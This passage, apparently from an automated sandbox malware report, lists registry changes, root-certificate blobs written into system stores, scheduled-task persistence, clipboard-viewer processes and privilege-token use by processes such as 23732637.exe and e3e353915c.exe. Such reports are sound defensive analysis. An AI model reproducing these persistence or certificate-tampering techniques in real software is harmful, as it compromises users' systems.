AA_v3.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\5e-9f-64-8b-3c-be\WpadDecisionReason = "1" AA_v3.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing AA_v3.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs AA_v3.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs AA_v3.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed AA_v3.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root AA_v3.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot AA_v3.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{13BC7E9D-2599-4B47-A581-F511E685240F}\5e-9f-64-8b-3c-be AA_v3.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA AA_v3.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA AA_v3.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs AA_v3.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs AA_v3.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs AA_v3.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs AA_v3.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 AA_v3.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{13BC7E9D-2599-4B47-A581-F511E685240F} AA_v3.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" AA_v3.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs AA_v3.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{13BC7E9D-2599-4B47-A581-F511E685240F}\WpadDecision = "0" AA_v3.exe -
Modifies registry class 5 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.IPjaex13M 23732637.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.IPjaex13M\ = "IPjaex13M" 23732637.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\IPjaex13M\DefaultIcon 23732637.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\IPjaex13M 23732637.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\IPjaex13M\DefaultIcon\ = "C:\\ProgramData\\IPjaex13M.ico" 23732637.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 e3e353915c.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 iexplore.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 iexplore.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e e3e353915c.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 e3e353915c.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e e3e353915c.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25190000000100000010000000ba4f3972e7aed9dccdc210db59da13c92000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a e3e353915c.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 iexplore.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a iexplore.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a iexplore.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 30 IoCs
pid Process 3624 PING.EXE 4036 PING.EXE 2180 PING.EXE 3084 PING.EXE 4228 PING.EXE 4620 PING.EXE 2948 PING.EXE 3920 PING.EXE 4412 PING.EXE 2480 PING.EXE 1384 PING.EXE 5128 PING.EXE 3816 PING.EXE 5012 PING.EXE 6016 PING.EXE 4812 PING.EXE 3880 PING.EXE 3744 PING.EXE 2096 PING.EXE 4616 PING.EXE 4344 PING.EXE 3272 PING.EXE 3908 PING.EXE 4744 PING.EXE 5000 PING.EXE 3892 PING.EXE 4356 PING.EXE 5928 PING.EXE 4244 PING.EXE 4428 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 8 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4360 schtasks.exe 5552 schtasks.exe 1444 schtasks.exe 5620 schtasks.exe 3592 schtasks.exe 4092 schtasks.exe 2660 schtasks.exe 4576 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 5052 powershell.exe 3612 1513115570.exe 308 2002914642.exe 1648 88aext0k.exe 1648 88aext0k.exe 1648 88aext0k.exe 1648 88aext0k.exe 1648 88aext0k.exe 4616 3721125312.exe 4616 3721125312.exe 2452 explorer.exe 4704 powershell.exe 2452 explorer.exe 4616 3721125312.exe 4616 3721125312.exe 2452 explorer.exe 2452 explorer.exe 2452 explorer.exe 2452 explorer.exe 2452 explorer.exe 3992 23732637.exe 3992 23732637.exe 3992 23732637.exe 3992 23732637.exe 3992 23732637.exe 3992 23732637.exe 3992 23732637.exe 3992 23732637.exe 2452 explorer.exe 2452 explorer.exe 3840 winupsecvmgr.exe 3840 winupsecvmgr.exe 2696 powershell.exe 3992 23732637.exe 3992 23732637.exe 2452 explorer.exe 3840 winupsecvmgr.exe 3840 winupsecvmgr.exe 3840 winupsecvmgr.exe 3840 winupsecvmgr.exe 2452 explorer.exe 3992 23732637.exe 3992 23732637.exe 2452 explorer.exe 5112 powershell.exe 2452 explorer.exe 2452 explorer.exe 2452 explorer.exe 2452 explorer.exe 2452 explorer.exe 2452 explorer.exe 872 powershell.exe 2376 powershell.exe 3192 intosvc.exe 3192 intosvc.exe 3192 intosvc.exe 3192 intosvc.exe 3192 intosvc.exe 3192 intosvc.exe 3192 intosvc.exe 3192 intosvc.exe 3192 intosvc.exe 3192 intosvc.exe 3192 intosvc.exe -
Suspicious behavior: SetClipboardViewer 4 IoCs
pid Process 4164 sysnldcvmr.exe 3552 sysmablsvr.exe 972 sysklnorbcv.exe 5052 sysvplervcs.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1596 4363463463464363463463463.exe Token: SeDebugPrivilege 1924 svchost.exe Token: SeDebugPrivilege 1904 XClient.exe Token: SeSecurityPrivilege 3144 clr.exe Token: SeRestorePrivilege 3144 clr.exe Token: SeDebugPrivilege 3244 taskkill.exe Token: SeDebugPrivilege 5052 powershell.exe Token: SeDebugPrivilege 1236 Vhpcde.exe Token: SeDebugPrivilege 2060 AddInUtil.exe Token: SeDebugPrivilege 3612 1513115570.exe Token: SeDebugPrivilege 4764 taskkill.exe Token: SeDebugPrivilege 308 2002914642.exe Token: SeShutdownPrivilege 3712 powercfg.exe Token: SeShutdownPrivilege 3508 powercfg.exe Token: SeShutdownPrivilege 3952 powercfg.exe Token: SeShutdownPrivilege 3932 powercfg.exe Token: SeLockMemoryPrivilege 2452 explorer.exe Token: SeLockMemoryPrivilege 2452 explorer.exe Token: SeDebugPrivilege 4704 powershell.exe Token: SeAssignPrimaryTokenPrivilege 3992 23732637.exe Token: SeBackupPrivilege 3992 23732637.exe Token: SeDebugPrivilege 3992 23732637.exe Token: 36 3992 23732637.exe Token: SeImpersonatePrivilege 3992 23732637.exe Token: SeIncBasePriorityPrivilege 3992 23732637.exe Token: SeIncreaseQuotaPrivilege 3992 23732637.exe Token: 33 3992 23732637.exe Token: SeManageVolumePrivilege 3992 23732637.exe Token: SeProfSingleProcessPrivilege 3992 23732637.exe Token: SeRestorePrivilege 3992 23732637.exe Token: SeSecurityPrivilege 3992 23732637.exe Token: SeSystemProfilePrivilege 3992 23732637.exe Token: SeTakeOwnershipPrivilege 3992 23732637.exe Token: SeShutdownPrivilege 3992 23732637.exe Token: SeDebugPrivilege 3992 23732637.exe Token: SeDebugPrivilege 2696 powershell.exe Token: SeLockMemoryPrivilege 3844 dwm.exe Token: SeLockMemoryPrivilege 3844 dwm.exe Token: SeBackupPrivilege 3992 23732637.exe Token: SeBackupPrivilege 3992 23732637.exe Token: SeSecurityPrivilege 3992 23732637.exe Token: SeDebugPrivilege 5112 powershell.exe Token: SeSecurityPrivilege 3992 23732637.exe Token: SeBackupPrivilege 3992 23732637.exe Token: SeBackupPrivilege 3992 23732637.exe Token: SeSecurityPrivilege 3992 23732637.exe Token: SeSecurityPrivilege 3992 23732637.exe Token: SeBackupPrivilege 3992 23732637.exe Token: SeBackupPrivilege 3992 23732637.exe Token: SeSecurityPrivilege 3992 23732637.exe Token: SeSecurityPrivilege 3992 23732637.exe Token: SeBackupPrivilege 3992 23732637.exe Token: SeBackupPrivilege 3992 23732637.exe Token: SeSecurityPrivilege 3992 23732637.exe Token: SeSecurityPrivilege 3992 23732637.exe Token: SeBackupPrivilege 3992 23732637.exe Token: SeBackupPrivilege 3992 23732637.exe Token: SeSecurityPrivilege 3992 23732637.exe Token: SeSecurityPrivilege 3992 23732637.exe Token: SeBackupPrivilege 3992 23732637.exe Token: SeBackupPrivilege 3992 23732637.exe Token: SeSecurityPrivilege 3992 23732637.exe Token: SeSecurityPrivilege 3992 23732637.exe Token: SeBackupPrivilege 3992 23732637.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 2452 explorer.exe 2452 explorer.exe 2452 explorer.exe 2452 explorer.exe 2452 explorer.exe 2452 explorer.exe 2452 explorer.exe 2452 explorer.exe 2452 explorer.exe 2452 explorer.exe 2452 explorer.exe 3844 dwm.exe 2452 explorer.exe 3844 dwm.exe 2452 explorer.exe 4012 iexplore.exe 2452 explorer.exe 3844 dwm.exe 2452 explorer.exe 3844 dwm.exe 2452 explorer.exe 3844 dwm.exe 2452 explorer.exe 3844 dwm.exe 2452 explorer.exe 3844 dwm.exe 2452 explorer.exe 3844 dwm.exe 2452 explorer.exe 3844 dwm.exe 2452 explorer.exe 3844 dwm.exe 2452 explorer.exe 3844 dwm.exe 2452 explorer.exe 3844 dwm.exe 2452 explorer.exe 3844 dwm.exe 2452 explorer.exe 3844 dwm.exe 2452 explorer.exe 3844 dwm.exe 2452 explorer.exe 3844 dwm.exe 2452 explorer.exe 3844 dwm.exe 2452 explorer.exe 3844 dwm.exe 2452 explorer.exe 3844 dwm.exe 2452 explorer.exe 3844 dwm.exe 2452 explorer.exe 3844 dwm.exe 2452 explorer.exe 3844 dwm.exe 2452 explorer.exe 3844 dwm.exe 2452 explorer.exe 3844 dwm.exe 2452 explorer.exe 3844 dwm.exe 2452 explorer.exe 3844 dwm.exe -
Suspicious use of SendNotifyMessage 64 IoCs
